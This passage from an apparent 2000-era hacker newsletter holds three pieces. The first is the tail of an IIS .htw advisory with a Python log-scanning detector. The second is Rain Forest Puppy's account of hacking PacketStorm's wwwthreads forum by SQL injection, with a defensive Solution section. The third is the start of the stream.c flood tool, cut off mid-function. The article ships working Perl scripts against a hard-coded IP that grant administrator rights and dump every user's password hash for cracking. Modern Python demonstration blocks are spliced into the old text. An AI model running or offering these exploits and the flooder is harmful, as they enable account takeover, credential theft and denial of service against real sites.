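    return unquote(rec.get("cs-uri-stem", "").replace("+", " "))


def classify(rec):
    """Return the indicators for one record; [] if it never reached webhits."""
    stem = decoded_stem(rec)
    if not stem.lower().endswith(".htw"):
        return []
    tags = ["htw-request"]              # webhits.dll was invoked at all
    if stem[:-4].endswith(" "):
        tags.append("padded-htw")       # spaces before .htw: the truncation trick
    query = rec.get("cs-uri-query", "-")
    params = parse_qs("" if query == "-" else query, keep_blank_values=True)
    for name, values in params.items():
        if name.lower() != "ciwebhitsfile":
            continue
        if any(DOTDOT.search(v) or ABSOLUTE.match(v) for v in values):
            tags.append("traversal")    # CiWebHitsFile points outside the vroot
    return tags


def scan(text):
    """Return [(client ip, decoded stem, tags)] for every .htw request."""
    hits = []
    for rec in parse_w3c(text):
        tags = classify(rec)
        if tags:
            hits.append((rec["c-ip"], decoded_stem(rec), tags))
    return hits


if __name__ == "__main__":
    for ip, stem, tags in scan(SAMPLE_LOG):
        print(f"{ip:15} {','.join(tags):32} {stem!r}")
```

The log only records what was requested, not whether the template existed, so the check cannot separate a working attack from a failed probe; on a server where the mapping has been removed, any .htw request at all is a probe worth noting, and the traversal and padding tags identify the ones that were aimed at this issue.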
In the left hand pane right click the computer you wish to administer and
from the menu that pops up choose Properties. From the Master Properties
select the WWW Service and then click Edit. The WWW Service Master Properties
window should open. From here click on the Home Directory tab and then click
the Configuration button. You should be presented with an App Mappings tab in
the Application Mappings window. Find the .htw extension, highlight it and
click Remove. If a confirmation window pops up select Yes to remove. Finally
click Apply, select all of the child nodes this should apply to, and click
OK. Now close all of the WWW Service property windows. Re-run the quick test
above: a request for a non-existent .htw file should no longer produce the
QUERY_STRING error.

About Cerberus Information Security, Ltd
****************************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other security auditing services. They are the
developers of CIS (Cerberus' Internet security scanner), available for free
from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally they continually research operating
system and popular service software vulnerabilities, leading to the discovery
of "world first" issues. This not only keeps the team sharp but also helps
the industry and vendors as a whole, ultimately protecting the end consumer.

As testimony to their ability and expertise one just has to look at exactly
how many major vulnerabilities have been discovered by the Cerberus Security
Team: over 40 to date, making them a clear leader among companies offering
such security services.

Founded in late 1999 by Mark and David Litchfield, Cerberus Information
Security, Ltd are located in London, UK but serve customers across the world.
For more information about Cerberus Information Security, Ltd please visit
their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

12.0 "How I hacked Packetstorm Security" by Rainforest Puppy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- Advisory RFP2K01 ------------------------------ rfp.labs ------------

                       "How I hacked PacketStorm"
                A look at hacking wwwthreads via SQL

------------------------------- rain forest puppy / rfp@wiretrip.net ---

Table of contents:
-1. Scope of problem
-2. Long explanation of SQL hacking
-3. Solution
-4. Conclusion
-5. Included perl scripts

------------------------------------------------------------------------

----[ 1. Scope of problem

Many applications are vulnerable to various forms of SQL hacking. While
programmers know they should avoid strcpy() and passing user data to a
system() call, many are unaware of how SQL queries can be tampered with.
This is more of a technical paper than an advisory, but it does explain how
I used a vulnerability in the wwwthreads package to gain administrative
access and some 800 passwords to PacketStorm's discussion forum.

----[ 2. Long explanation of SQL hacking

As with any other day, I was surfing around the PacketStorm forums, which
use wwwthreads. The URL parameters (the cruft after the '?' in a URL) of the
forums started catching my eye. Being the web security puppy I am, I started
getting curious. So, using an ultra-insightful hacking technique, I changed
the 'Board=general' parameter to read 'Board=rfp' in a request to the
showpost.pl script.
Lo and behold, I get the following error:

   We cannot complete your request. The reason reported was:
   Can't execute query: SELECT B_Main,B_Last_Post FROM rfp WHERE B_Number=1 .
   Reason: Table 'WWWThreads.rfp' doesn't exist

Seeing there's also a 'Number=1' parameter, we can figure this query is
constructed as

   SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number

Now, if any of you have read my Phrack 54 article (the SQL appension part,
available at http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2) you can see
where I'm going. We can not only substitute a $Board name and $Number, but
also extra SQL commands. Imagine if $Board were to equal

   general; DROP TABLE general; SELECT * FROM general

This would translate into

   SELECT B_Main,B_Last_Post FROM general; DROP TABLE general; SELECT * FROM general WHERE B_Number=$Number

Now the ';' is the generic command terminator. Normally we could use a '#' to
make MySQL ignore everything else on the line; however, the 'FROM' clause is
on a separate line from the 'WHERE' clause, so MySQL won't ignore it.
Considering that invalid SQL will cause MySQL to run none of the commands, we
at least need to give it a valid command string to parse; in this case we
feed a generic SELECT (similar to the original) back to it. The result of
this (theoretically) is to drop (delete) the general forum table. But in
reality, it doesn't work. Not because the theory is wrong, but because the
database user we're using doesn't have DROP privileges. (A further obstacle:
a stacked query like this also needs the client library to pass more than one
statement per call, which MySQL only added in 4.1, so the DROP would not have
run even with the privilege.) And due to how wwwthreads is written, it won't
let you do much with this anyway. But all is not lost: we can start changing
all the numbers left and right, looking for where it blows up... or we can go
the easy route and download the (eval) source code from www.wwwthreads.com.
Yeah, kind of cheating, but it's not quite a one-to-one solution. You see,
the eval code and the licensed code (which PacketStorm is running) are
slightly different, including their SELECT statements.
So we have to be a little creative. First, let's find the SELECT statement
(or equivalent) featured above. I like to use less, so I just 'less
showpost.pl' and search (the '/' key) for 'SELECT'. We come up with

   # Grab the main post number for this thread
   $query = qq!
      SELECT Main,Last_Post
      FROM   $Board
      WHERE  Number=$Number
   !;

Wow, that's it... except the field names (Main, Last_Post, Number) are
different from the pro version (B_Main, B_Last_Post, B_Number). If we look
right above it, we see

   # Once and a while it people try to just put a number into the url,
   if (!$Number) {
      w3t::not_right("There was a problem looking up the Post...

which is what limits the use of the $Number parameter.

At this point let's evaluate 'why' we want to go forth into this. Obviously
DROPping tables ranks right up there with other stupid DoS tricks. You may be
able to modify other people's posts, but that's lame too. Perhaps setting up
our own forum? All that information is stored in the DB. But that's a lot of
records to update. How about becoming a moderator? Or even better, an
administrator? Administrators can add, delete, and modify forums, boards, and
users. That may be a worthy goal, although you're still only limited to the
realm of the forum, which makes you king of a very small and pitiful domain.

However, there is one thing worthy. If you make yourself a user account,
you'll notice you have to enter a password. Hmmm... those passwords are
stored someplace... like, in the database. If we hedge on our 'password
reuse' theory, combined with the fact that wwwthreads (in some
configurations) posts the IP address of the poster, we have some
possibilities worth checking out.

So, let's look at this password thing. Going into 'edit profile' gives us a
password field, which looks an awful lot like a crypt hash (view the HTML
source). Damn, so the passwords are hashed. Well, that just means you'll need
a password cracker and more time before you can start checking on password
reuse.
Assuming we *can* get the passwords...

Let's start with the administrator access first. The adduser.pl script is a
good place to start, since it should show us all parameters of a user. Notice
the following code:

   # --------------------------------------
   # Check to see if this is the first user
   $query = qq!
      SELECT Username
      FROM   Users
   !;
   $sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr. Query: $query";
   $sth -> execute() or die "Can't execute query: $query. Reason: $DBI::errstr";
   my $Status = "";
   my $Security = $config{'user_security'};
   my $rows = $sth -> rows;
   $sth -> finish;

   # -------------------------------------------------------
   # If this is the first user, then status is Administrator
   # otherwise they are just get normal user status.
   if (!$rows){
      $Status = "Administrator";
      $Security = 100;
   }
   else {
      $Status = "User";
   }

What this does is look to see if any users are defined. If no users are
defined, the first user added gets the Status of 'Administrator' and a
security level of 100. After that, all added users just get Status=User. So
we need to find a way to make our Status=Administrator. A full user record
can be seen a little further down...

   # ------------------------------
   # Put the user into the database
   my $Status_q   = $dbh -> quote($Status);
   $Username_q    = $dbh -> quote($Username);
   my $Email_q    = $dbh -> quote($Email);
   my $Display_q  = $dbh -> quote($config{'postlist'});
   my $View_q     = $dbh -> quote($config{'threaded'});
   my $EReplies_q = $dbh -> quote("Off");
   $query = qq!
      INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort,
                         Display,View,PostsPer,EReplies,Security,Registered)
      VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'},
              $Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date)
   !;

Now, I should take a moment here and explain the quote() function.
A string value of "blah blah blah", when stuck into a query that looks like
"SELECT * FROM table WHERE data=$data", will wind up looking like

   SELECT * FROM table WHERE data=blah blah blah

which is not valid. The database doesn't know what to do with the extra two
blahs, since they look like commands. Therefore all string data needs to be
encapsulated in single quotes ('). The query should look like

   SELECT * FROM table WHERE data='blah blah blah'

which is correct. Now, in my SQL appension article I talk about 'breaking
out' of the single-quoted string by including your own single quote. So if
we submitted "blah blah' MORE SQL COMMANDS...", it would look like

   SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...'
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                  data we submitted

This causes the SQL engine to interpret MORE SQL COMMANDS as actual SQL
commands, since it figured the 'data' part of the string ended with the
second single quote (the one we submitted). This is a drawback of converting
data into a 'human readable' string to be parsed back into data again: it's
hard to determine what's 'code/commands' and what's 'data'.

All is not lost, however. Submitting '' tells the SQL engine NOT to end the
data string, but rather to treat it as a single quote in the data context.
Therefore the following query

   SELECT * FROM table WHERE data='data''more data'

makes the database look for the value "data'more data". So to keep people
from breaking out of strings and submitting extra SQL commands, all you have
to do is double up every single quote (turn ' into ''). This will ensure that
all data is indeed considered data. And this is what the DBI->quote()
function does: it puts single quotes around the string and doubles all single
quotes in the string. (One caveat: MySQL also treats backslash as an escape
character inside strings, so quoting there must escape backslashes as well,
or a submitted \' would neutralise the doubled quote; DBD::mysql's quote()
handles this, a hand-rolled quote-doubling does not.)

So after all of that explanation, the short of it is that anything that is
run through quote() is of no use to us, because we can't submit extra SQL
commands or otherwise tamper with anything fun.
And if you look, wwwthreads uses quote() extensively. So this may be rough.
But all is not lost...

You see, there are different field types. You can have strings, boolean
values, various numeric values, etc. While a string field needs to be in the
format field='data', a numeric field is written without the quotes:
numeric_field=2, not numeric_field='2'. Ah ha! There are no quotes to deal
with, and quote() can't protect a value that is never quoted. The correct
solution is to make sure all numeric field data is indeed numeric (more on
this later). But I'll give you a hint... wwwthreads doesn't go that far (nor
do most applications, actually).

So, now we need a SQL statement that preferably deals with a table we are
interested in. A SELECT statement (retrieves data) is tougher, since we'd
need to include a whole other query to do something other than SELECT.
INSERT and UPDATE are nice because we're already modifying data... we can
just ride in more data to update (hopefully). Poking around brings us to a
very nice spot... changeprofile.pl. This is the script that takes data
entered in editprofile.pl and enters the changes into the database. Of
course, the profile is our user profile. This means that to use this we need
a valid user account. In any event, let's have a look-see...
   # Format the query words
   my $Password_q    = $dbh -> quote($Password);
   my $Email_q       = $dbh -> quote($Email);
   my $Fakeemail_q   = $dbh -> quote($Fakeemail);
   my $Name_q        = $dbh -> quote($Name);
   my $Signature_q   = $dbh -> quote($Signature);
   my $Homepage_q    = $dbh -> quote($Homepage);
   my $Occupation_q  = $dbh -> quote($Occupation);
   my $Hobbies_q     = $dbh -> quote($Hobbies);
   my $Location_q    = $dbh -> quote($Location);
   my $Bio_q         = $dbh -> quote($Bio);
   my $Username_q    = $dbh -> quote($Username);
   my $Display_q     = $dbh -> quote($Display);
   my $View_q        = $dbh -> quote($View);
   my $EReplies_q    = $dbh -> quote($EReplies);
   my $Notify_q      = $dbh -> quote($Notify);
   my $FontSize_q    = $dbh -> quote($FontSize);
   my $FontFace_q    = $dbh -> quote($FontFace);
   my $ICQ_q         = $dbh -> quote($ICQ);
   my $Post_Format_q = $dbh -> quote($Post_Format);
   my $Preview_q     = $dbh -> quote($Preview);

Ack! Practically everything is quoted! That means all those parameters are
useless to us. And let's peek at the final query that sticks all our
information back into the database:

   # Update the User's profile
   my $query =qq!
      UPDATE Users
      SET    Password    = $Password_q,
             Email       = $Email_q,
             Fakeemail   = $Fakeemail_q,
             Name        = $Name_q,
             Signature   = $Signature_q,
             Homepage    = $Homepage_q,
             Occupation  = $Occupation_q,
             Hobbies     = $Hobbies_q,
             Location    = $Location_q,
             Bio         = $Bio_q,
             Sort        = $Sort,
             Display     = $Display_q,
             View        = $View_q,
             PostsPer    = $PostsPer,
             EReplies    = $EReplies_q,
             Notify      = $Notify_q,
             TextCols    = $TextCols,
             TextRows    = $TextRows,
             FontSize    = $FontSize_q,
             FontFace    = $FontFace_q,
             Extra1      = $ICQ_q,
             Post_Format = $Post_Format_q,
             Preview     = $Preview_q
      WHERE  Username    = $Username_q
   !;

Since wwwthreads nicely slaps the '_q' on the quoted variables, it's easy to
see. See it? $Sort, $PostsPer, $TextCols, and $TextRows aren't quoted.
Now, let's figure out where that data comes from:

   my $Sort     = $FORM{'sort_order'};
   my $PostsPer = $FORM{'PostsPer'};
   my $TextCols = $FORM{'TextCols'};
   my $TextRows = $FORM{'TextRows'};

Wow, they're taken straight from the submitted form data. That means they
are not checked or validated in any way. Here's our chance!

Going back to the structure of the user record (given above), there's a
'Status' field we need to change. Looking in this UPDATE query, Status isn't
listed. So this means that the Status field is going to remain unchanged.
Bummer.

See what we're going to do yet? Take a second and think about it. Remember,
all of this hinges on the fact that we want to submit what looks like data
but that the SQL engine/database will interpret differently. Notice in the
query that the fields are listed in the format field=value, field=value,
field=value, etc. (of course, they're on separate lines). If I were to
insert some fake values (for the sake of example), I might have

   Name='rfp', Signature='rfp', Homepage='www.wiretrip.net/rfp/'

All I did was put the fields on the same line, collapse the whitespace, and
fill in the (quoted) string values. This is valid SQL. Now, let's put this
all together. Looking at the 'Sort' variable (which is numeric), we would
feasibly have

   Bio='puppy', Sort=5, Display='threaded'

which is still valid SQL. Since $Sort=$FORM{'sort_order'}, the above value
for Sort was given by submitting the parameter sort_order=5. Now, let's use
Sort to our advantage. What if we were to include a comma, and then some more
column values? Oh, say, the Status field? Let's set the sort_order parameter
to "5, Status='Administrator'" (no trailing comma; the query template
supplies the one before Display) and then let it run its course. Eventually
we'll get a query that looks like

   Bio='puppy', Sort=5, Status='Administrator', Display='threaded'
                        ^^^^^^^^^^^^^^^^^^^^^^
                        our submitted data

This is still valid SQL! And furthermore, it will cause the database to
update the Status field to be 'Administrator'!
But remember when we looked in adduser.pl, the first user had a Security
level of 100. We want that too, so we set the sort_order parameter to
"5, Status='Administrator', Security=100", and then we get

   Bio='puppy', Sort=5, Status='Administrator', Security=100, ...

which updates both values to what we want. The database, not knowing any
better, will update those two fields, and now the forums will think we're an
administrator.

So I go to apply this new technique on PacketStorm... and get a 404 for
requests to changeprofile.pl. Yep, the pro version doesn't have it.
Navigating the 'Edit Profile' menu, I see that it has 'Basic Profile',
'Display Preferences', and 'Email Notifications/Subscriptions', which the
demo does not (it's all lumped together). Wonderful. If they changed the
scripts around, they may have also changed the SQL queries (well, they had
to, actually). So now we're in 'blackbox' mode (blindly making educated
guesses at what's going on).

Since we still want to play with the sort_order parameter, you'll see that
it's contained in the 'Display Preferences' script (editdisplay.pl). This
script handles the sort_order, display, view, PostsPer, Post_Format, Preview,
TextCols, TextRows, FontSize, FontFace, PictureView, and PicturePost
parameters (gained by viewing the HTML source). So it's a subset of the
parameters. Using the above code snippets, we can guess at what the SQL
query looks like. So why not give it a shot?

First I poke some invalid values into sort_order (characters instead of
numbers). This causes an error, which I figured. Since, in the first
example, the fields of the 'Board' table were prefixed with 'B_', the 'User'
table (which we are now using) prefixes columns with 'U_'. So that means we
need to use 'U_Status' and 'U_Security' for field names. Good thing we
checked. Since this needs to be a valid form submit, we need to submit values
for all of the listed variables.
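As an added example, not code from wwwthreads or from this article, the following Python script reproduces both points made above against an in-memory SQLite table: why a breakout attempt through a field that went through quote() goes nowhere, and why the same payload in the unquoted numeric Sort field rewrites Status and Security. The table is cut down to the columns the example needs and uses the demo-version column names (Status, Security) rather than the pro version's U_ prefixed ones. The vulnerable function builds the UPDATE the way changeprofile.pl does; the fixed one scrubs the number the way the onlynumbers() sub in the Solution section does and additionally binds every value with a placeholder.

```python
"""Unquoted numeric field injection against a wwwthreads-style Users table.

Added example; not code from wwwthreads or from this article. The schema is
a cut-down version of the Users table seen in the adduser.pl snippet, with
the demo-version column names (Status, Security) rather than the pro
version's U_ prefixed ones.
"""
import re
import sqlite3


def fresh_db():
    """In-memory database holding one ordinary user."""
    db = sqlite3.connect(":memory:")
    db.execute("""CREATE TABLE Users (
                    Username TEXT PRIMARY KEY,
                    Status   TEXT,
                    Security INTEGER,
                    Sort     INTEGER,
                    Display  TEXT)""")
    db.execute("INSERT INTO Users VALUES ('rfp', 'User', 1, 0, 'threaded')")
    db.commit()
    return db


def sql_quote(value):
    """What DBI->quote does for a plain SQL string: wrap in single quotes and
    double every embedded single quote. (That is SQLite's only string escape;
    on MySQL a backslash would have to be escaped as well.)"""
    return "'" + value.replace("'", "''") + "'"


def vulnerable_update(db, username, sort_order, display):
    """Builds the UPDATE the way changeprofile.pl does: strings go through
    quote(), the numeric Sort value is interpolated untouched."""
    query = ("UPDATE Users SET Sort = %s, Display = %s WHERE Username = %s"
             % (sort_order, sql_quote(display), sql_quote(username)))
    db.execute(query)
    db.commit()
    return query


def onlynumbers(data):
    """Python equivalent of the article's onlynumbers() sub (tr/0-9//cd)."""
    return re.sub(r"[^0-9]", "", data)


def fixed_update(db, username, sort_order, display):
    """Scrub the number, refuse an empty result, and bind every value with a
    placeholder so no user data is ever spliced into the SQL text."""
    digits = onlynumbers(sort_order)
    if not digits:
        raise ValueError("sort_order must contain a number")
    db.execute("UPDATE Users SET Sort = ?, Display = ? WHERE Username = ?",
               (int(digits), display, username))
    db.commit()


def privileges(db, username):
    """(Status, Security) for the user, read with a bound parameter."""
    return db.execute("SELECT Status, Security FROM Users WHERE Username = ?",
                      (username,)).fetchone()


# The sort_order value from the article, with the demo-version column names.
PAYLOAD = "5,Status='Administrator',Security=100"
# The same idea aimed at a *quoted* field, to show why quote() holds.
QUOTED_ATTEMPT = "threaded', Status='Administrator"


def demo():
    """Run the attack against the vulnerable and the fixed update; return the
    (Status, Security) pair observed after each step."""
    db = fresh_db()
    before = privileges(db, "rfp")

    vulnerable_update(db, "rfp", PAYLOAD, "threaded")
    after_numeric_injection = privileges(db, "rfp")

    db = fresh_db()
    vulnerable_update(db, "rfp", "5", QUOTED_ATTEMPT)
    after_quoted_attempt = privileges(db, "rfp")   # quote() neutralised it

    db = fresh_db()
    fixed_update(db, "rfp", PAYLOAD, "threaded")
    after_fix = privileges(db, "rfp")

    return before, after_numeric_injection, after_quoted_attempt, after_fix


if __name__ == "__main__":
    labels = ["before", "vulnerable + payload",
              "vulnerable + quoted attempt", "fixed + payload"]
    for label, (status, security) in zip(labels, demo()):
        print(f"{label:30} Status={status!r} Security={security}")
```

Note what the 'silent' scrub does with the payload: onlynumbers() turns it into 5100, a legal but meaningless sort value, so the attack fails quietly rather than loudly; an application that would rather know about the attempt should compare the scrubbed value with the original and log or reject on a mismatch.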
At this point I should also point out (again) that we need a valid user
account whose status we are increasing. We'll need the username and password
(hash), which are printed as hidden form elements on various forms (like
editdisplay.pl). You'll see the parameters are Username and Oldpass. So based
on all of this, we can construct a URL that looks like

   changedisplay.pl?
      Cat=
      &Username=rfp
      &Oldpass=(valid password hash)
      &sort_order=5,U_Status%3d'Administrator',U_Security%3d100
      &display=threaded
      &view=collapsed
      &PostsPer=10
      &Post_Format=top
      &Preview=on
      &TextCols=60
      &TextRows=5
      &FontSize=0
      &FontFace=
      &PictureView=on
      &PicturePost=off

The important one of course being

   &sort_order=5,U_Status%3d'Administrator',U_Security%3d100

which is just an escaped version of what we used above (the %3d translates
to the '=' character). When you lump it all together into a single string,
you get

   changedisplay.pl?Cat=&Username=rfp&Oldpass=(valid password hash)&sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded&view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off

which, while gross, is what it needs to be. So, I submit this to
PacketStorm, and get

   Your display preferences have been modified.

Wonderful. But, looking at the top menu, I see an 'Admin' option now. I
click it, and what do I see but the heart-warming message of

   As an Administrator the following options are available to you.

Bingo! Administrator privileges! Looking at my options, I can edit users,
boards, or forums, assign moderators and administrators, ban users/hosts,
expire/close/open threads, etc.

Now for our second objective... the passwords. I go into 'Show/Edit Users',
and am asked to pick the first letter of the usernames I'm interested in. So
I pick 'R'. A list of all 'R*' users comes up. I click on 'rfp'. And there we
go, my password hash. Unfortunately, there's no nice and easy way to dump all
users and their hashes.
Bummer. So I automated a perl script to do it for me, and dump the output in
a format that can be fed into John the Ripper.

----[ 3. Solution

Now, how to defend against this? As you saw, the reason this worked was that
unrestricted data was passed straight into SQL queries. Luckily wwwthreads
quoted (most) string data, but it didn't touch numeric data. The solution is
to make sure numeric data is indeed numeric. You can do it the 'silent' way
with a function like

   sub onlynumbers { ($data=shift)=~tr/0-9//cd; return $data;}

and, just as all string data is passed through DBI->quote(), pass all numeric
data through onlynumbers(). So, for the above example, it would be better to
use

   my $Sort = onlynumbers($FORM{'sort_order'});

Note what 'silent' means here: the payload
5,U_Status='Administrator',U_Security=100 comes back as 5100, and a value
with no digits at all comes back as the empty string, which would leave
"Sort = ," in the query and make it fail; check for an empty result and
reject or default it rather than interpolating it. Where the database driver
supports them, DBI placeholders (?) with bind values are better still, since
the driver then never has to parse data back out of the query text. Table and
column names cannot be bound, however, so they still need scrubbing.

Another area that needs to be verified is the table name. In our very first
example, we had 'Board=general'. As you can see, a table name is not quoted
like a string. Therefore we also need to run all table names through a
function to clean them up. Assuming table names can contain letters, numbers
and periods, we can scrub them with

   sub scrubtable { ($data=shift)=~tr/a-zA-Z0-9.//cd; return $data;}

which removes all other cruft. In the end, *all* (let me repeat that...
**ALL**) incoming user data should be passed through quote(), onlynumbers()
or scrubtable()... NO EXCEPTIONS! Passing user data straight into a SQL query
is asking for someone to tamper with your database.

New versions of wwwthreads are available from www.wwwthreads.com, which
implement the solutions pretty much as I've described them here.

----[ 4. Conclusion

I've included two scripts below. wwwthreads.pl will run the query for you
against a pro version of wwwthreads. You just have to give the IP address of
the server running wwwthreads, and a valid user and password hash.
w3tpass.pl will walk and download all wwwthreads user password hashes, and
give output suitable for password cracking with John the Ripper.
Thanks to PacketStorm for being a good sport about this.

- Rain Forest Puppy / rfp@wiretrip.net - I feel a rant coming on...

----[ 5. Included perl scripts

-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net

use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

# the injected value rides in sort_order; %3d is an escaped '='
$parms="Cat=&Username=$username&Oldpass=$passhash".
   "&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
   "&display=threaded&view=collapsed&PostsPer=10".
   "&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
   "&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
   "Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

# open a TCP connection to $ip:80, send the raw request, return the reply lines
sub sendraw {
   my ($pstr)=@_;
   my $target;
   $target= inet_aton($ip) || die("inet_aton problems");
   socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
      die("Socket problems\n");
   if(connect(S,pack "SnA4x8",2,80,$target)){
      select(S); $|=1; print $pstr;
      my @in=<S>;
      select(STDOUT); close(S);
      return @in;
   } else { die("Can't connect...\n"); }
}

-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net

use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";

#####################################################

# showusers.pl lists users by first letter; walk every letter
@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');

print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";

foreach $let (@letts){
   $parms="Cat=&Start=$let";
   $tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
      "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
      "Cookie: Username=$username; Password=$passhash\r\n\r\n";
   my @D=sendraw($tosend);
   foreach $line (@D){
      if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
         push @users, $1;}}}

$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
   "Fetching individual passwords...\r\n";

# the hash is printed as the hidden OldPass field of each user's edit form
foreach $user (@users){
   $parms="User=$user";
   $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
      "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
      "Cookie: Username=$username; Password=$passhash\r\n\r\n";
   my @D=sendraw($tosend);
   foreach $line (@D){
      if($line=~/OldPass value = "([^"]+)"/){
         # undo URL escaping, then emit a passwd-style line for John
         ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
         $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
         print $user.':'.$pass."::::::::::\n";
         last;}}}

print STDERR "done.\r\n\r\n";

# open a TCP connection to $ip:80, send the raw request, return the reply lines
sub sendraw {
   my ($pstr)=@_;
   my $target;
   $target= inet_aton($ip) || die("inet_aton problems");
   socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
      die("Socket problems\n");
   if(connect(S,pack "SnA4x8",2,80,$target)){
      select(S); $|=1; print $pstr;
      my @in=<S>;
      select(STDOUT); close(S);
      return @in;
   } else { die("Can't connect...\n"); }
}

# Greets to everyone who hasn't used RDS to deface a website (small crowd)

--- rain forest puppy / rfp@wiretrip.net ------------- ADM / wiretrip ---
SQL hacking has many ins, many outs; there's many levels of complexity...
--- Advisory RFP2K01 ------------------------------ rfp.labs ------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 13.0 The stream.c exploit ~~~~~~~~~~~~~~~~~~~~ #include #include #include #include #include #include #include #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include #include #include #include #include #include #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, /* header length in 32 bit words */ ip_v:4; /* ip version */ u_char ip_tos; /* type of service */ u_short ip_len; /* total packet length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* ip checksum */ u_long saddr, daddr; /* source and dest address */ }; struct tcp_hdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ u_long th_seq; /* sequence number */ u_long th_ack; /* acknowledgement number */ u_int th_x2:4, /* unused */ th_off:4; /* data offset */ u_char th_flags; /* flags field */ u_short th_win; /* window size */ u_short th_sum; /* tcp checksum */ u_short th_urp; /* urgent pointer */ }; struct tcpopt_hdr { u_char type; /* type */ u_char len; /* length */ u_short value; /* value */ }; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; /* struct tcpopt_hdr opt; */ }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short dstport, pktsize, pps; u_long dstaddr; int sock; void 
usage(char *progname) { fprintf(stderr, "Usage: %s \n", progname); fprintf(stderr, " dstaddr - the target we are trying to attack.\n"); fprintf(stderr, " dstport - the port of the target, 0 = random.\n"); fprintf(stderr, " pktsize - the extra size to use. 0 = normal syn.\n"); exit(1); } /* This is a reference internet checksum implimentation, not very fast */ inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x08; packet.ip.ip_id = rand(); 